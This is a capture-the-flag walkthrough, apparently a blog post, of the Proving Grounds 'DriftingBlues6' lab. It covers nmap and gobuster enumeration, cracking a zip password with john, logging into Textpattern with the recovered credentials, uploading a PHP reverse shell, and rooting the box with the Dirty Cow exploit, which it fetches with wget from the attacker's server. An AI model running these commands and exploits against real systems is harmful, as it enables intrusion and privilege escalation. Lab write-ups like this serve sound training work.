In this walk through, we will be going through the DriftingBlues6 room from Proving Grounds. This room is rated as Easy on the platform and it consists of basic enumeration of the Textpattern CMS resulting in later getting a RCE on the target. For the privilege escalation part, it require use of a popular Linux kernel exploit. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Monitoring |
IPaddress | 192.168.225.136 |
Difficulty | Easy |
OS | Linux |
Description | DriftingBlues6 is an easy rated machine and it involves basic enumeration of the Textpattern CMS resulting in later getting a RCE on the target. For the privilege escalation part, it requires use of a popular Linux kernel exploit. |
Enumeration:
- I started off with my regular nmap aggressive scan and found only one port open – 80 (HTTP).
$ sudo nmap -A 192.168.223.219 [sudo] password for wh1terose: Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-09 14:18 IST Nmap scan report for 192.168.223.219 Host is up (0.21s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 53/tcp filtered domain 80/tcp open http Apache httpd 2.2.22 ((Debian)) | http-robots.txt: 1 disallowed entry |_/textpattern/textpattern |_http-server-header: Apache/2.2.22 (Debian) |_http-title: driftingblues | vulners: | cpe:/a:apache:http_server:2.2.22: | CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679 | CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169 | CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167 | SSV:60427 6.9 https://vulners.com/seebug/SSV:60427 *EXPLOIT* | SSV:60386 6.9 https://vulners.com/seebug/SSV:60386 *EXPLOIT* | SSV:60069 6.9 https://vulners.com/seebug/SSV:60069 *EXPLOIT* | CVE-2012-0883 6.9 https://vulners.com/cve/CVE-2012-0883 | PACKETSTORM:127546 6.8 https://vulners.com/packetstorm/PACKETSTORM:127546 *EXPLOIT* | CVE-2016-5387 6.8 https://vulners.com/cve/CVE-2016-5387 | CVE-2014-0226 6.8 https://vulners.com/cve/CVE-2014-0226 | 1337DAY-ID-22451 6.8 https://vulners.com/zdt/1337DAY-ID-22451*EXPLOIT* | CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788 | SSV:60788 5.1 https://vulners.com/seebug/SSV:60788 *EXPLOIT* | CVE-2013-1862 5.1 https://vulners.com/cve/CVE-2013-1862 | SSV:96537 5.0 https://vulners.com/seebug/SSV:96537 *EXPLOIT* | SSV:62058 5.0 https://vulners.com/seebug/SSV:62058 *EXPLOIT* | SSV:61874 5.0 https://vulners.com/seebug/SSV:61874 *EXPLOIT* | EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D 5.0 https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D *EXPLOIT* | EDB-ID:42745 5.0 https://vulners.com/exploitdb/EDB-ID:42745 *EXPLOIT* | CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798 | CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743 | CVE-2015-3183 5.0 https://vulners.com/cve/CVE-2015-3183 | CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231 | CVE-2014-0098 5.0 https://vulners.com/cve/CVE-2014-0098 | CVE-2013-6438 5.0 https://vulners.com/cve/CVE-2013-6438 | CVE-2013-5704 5.0 https://vulners.com/cve/CVE-2013-5704 | 1337DAY-ID-28573 5.0 https://vulners.com/zdt/1337DAY-ID-28573*EXPLOIT* | CVE-2012-0031 4.6 https://vulners.com/cve/CVE-2012-0031 | SSV:60905 4.3 https://vulners.com/seebug/SSV:60905 *EXPLOIT* | SSV:60657 4.3 https://vulners.com/seebug/SSV:60657 *EXPLOIT* | SSV:60653 4.3 https://vulners.com/seebug/SSV:60653 *EXPLOIT* | SSV:60345 4.3 https://vulners.com/seebug/SSV:60345 *EXPLOIT* | CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975 | CVE-2014-0118 4.3 https://vulners.com/cve/CVE-2014-0118 | CVE-2013-1896 4.3 https://vulners.com/cve/CVE-2013-1896 | CVE-2012-4558 4.3 https://vulners.com/cve/CVE-2012-4558 | CVE-2012-3499 4.3 https://vulners.com/cve/CVE-2012-3499 | CVE-2012-0053 4.3 https://vulners.com/cve/CVE-2012-0053 | CVE-2008-0455 4.3 https://vulners.com/cve/CVE-2008-0455 |_ CVE-2012-2687 2.6 https://vulners.com/cve/CVE-2012-2687 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=1/9%OT=80%CT=1%CU=40703%PV=Y%DS=4%DC=T%G=Y%TM=659D0873 OS:%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%II=I%TS=8)SEQ(SP=10 OS:7%GCD=1%ISR=10D%TI=Z%TS=8)OPS(O1=M54EST11NW4%O2=M54EST11NW4%O3=M54ENNT11 OS:NW4%O4=M54EST11NW4%O5=M54EST11NW4%O6=M54EST11)WIN(W1=3890%W2=3890%W3=389 OS:0%W4=3890%W5=3890%W6=3890)ECN(R=Y%DF=Y%T=40%W=3908%O=M54ENNSNW4%CC=Y%Q=) OS:T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y% OS:T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164 OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=A359%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 4 hops TRACEROUTE (using port 554/tcp) HOP RTT ADDRESS 1 206.53 ms 192.168.45.1 2 206.53 ms 192.168.45.254 3 206.57 ms 192.168.251.1 4 206.66 ms 192.168.223.219 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 40.85 seconds
- Enumerated the web server running on port 80 and found a static page with information related to an album, i guess.
- Fired gobuster on the target to reveal some hidden directories. The two interesting ones was – /robots and /textpattern.
$ gobuster dir -u http://192.168.223.219/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.223.219/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2024/01/09 14:31:28 Starting gobuster in directory enumeration mode =============================================================== /db (Status: 200) [Size: 53656] /index (Status: 200) [Size: 750] /robots (Status: 200) [Size: 110] /textpattern (Status: 301) [Size: 324] [--> http://192.168.223.219/textpattern/] /server-status (Status: 403) [Size: 296] =============================================================== 2024/01/09 14:38:03 Finished ===============================================================
- Checked the robots.txt file and it shows an entry to disallow crawl access to a specifc directory – /textpattern/textpattern.
- I first enumerated the directory /textpattern and it shows me a page which seems like a front page of a blog. Found nothing interesting here as the links were also pointing to a non-accessible host.
- Next moved to /textpattern/textpattern directory and it reveals a login page. Confirming the Textpattern CMS. Next, i performed a directory bruteforce again and found another directory /textpattern which reveals the version we are dealing with here – 4.8.3. This might come handy later.
- At this point, i searched for the default creds of Textpattern CMS but found nothing credible. Next, tried bunch of common username and password combo but still found no luck. Finally after a lots of irrelevant enumeration, i once again performed a directory bruteforce on the root directory with a different wordlist and this time it gave me another directory – “spammer” which contains a zip file called spammer.zip.
$ gobuster dir -u http://192.168.216.219/ -w ~/Desktop/Wordlist/directory-medium.txt -x zip =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.216.219/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/directory-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: zip [+] Timeout: 10s =============================================================== 2024/01/10 13:52:16 Starting gobuster in directory enumeration mode =============================================================== /index (Status: 200) [Size: 750] /db (Status: 200) [Size: 53656] /robots (Status: 200) [Size: 110] /spammer (Status: 200) [Size: 179] /spammer.zip (Status: 200) [Size: 179]
Initial Access:
- Downloaded the zip file to my local machine however it was protected with a password. So, cracked the password using john – myspace4.
zip2john spammer.zip > hash john hash
myspace4
- After unzipping the file, i got the Textpattern backend creds.
unzip spammer.zip
mayer:lionheart
- Logged into the dashboard. Now, i looked for any known exploits on the application for the running version and found out that it is vulnerable to a Authenticated RCE vulnerability. I tried the available exploits but they tend to fail. So, i performed the exploitation manually.
- Uploaded my PHP reverse shell payload using the application’s files section which can be found under the “Content” tab in the header menu.
- Executed my payload by visiting the below URL and got the connection back at my netcat listener.
Privilege Escalation:
- Checked the running kernel version number and it shows – 3.2.0-4-amd64 which is quite old. So, i checked for known exploits for it and found that it is vulnerable to “Dirty Cow” vulnerability.
- Transferred the below exploit onto the target by spawning an HTTP server on our local machine.
Exploit: https://www.exploit-db.com/exploits/40839
wget http://192.168.45.240:8000/40839.c
- Compiled and executed the exploit. The exploit will prompt you to enter a new password for the new user that will have root privileges. It maybe take a minute to complete.
gcc -pthread 40839.c -o exploit -lcrypt chmod +x exploit ./exploit
- After the process is complete, switched to the newly created root user. Thus, getting root on the target.
su firefart password
Also Read: PG – Crane
Conclusion:
So that was “DriftingBlues6” for you. We started off with a regular nmap scan and only one port opened – 80 (HTTP). Enumerated the web server on port 80 and found a textpattern login panel. Fired gobuster on the target and found a spammer.zip file. Next, used john to crack the password of the zip file. The zip file reveals the password of the textpattern login panel. Used the same to get into the backend of the textpattern CMS. Next, abused the file upload functionality to get initial access on the target. For Privilege Escalation, found out that the Linux version running is vulnerable to DirtyCow exploit. Used the same to get root on the target. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.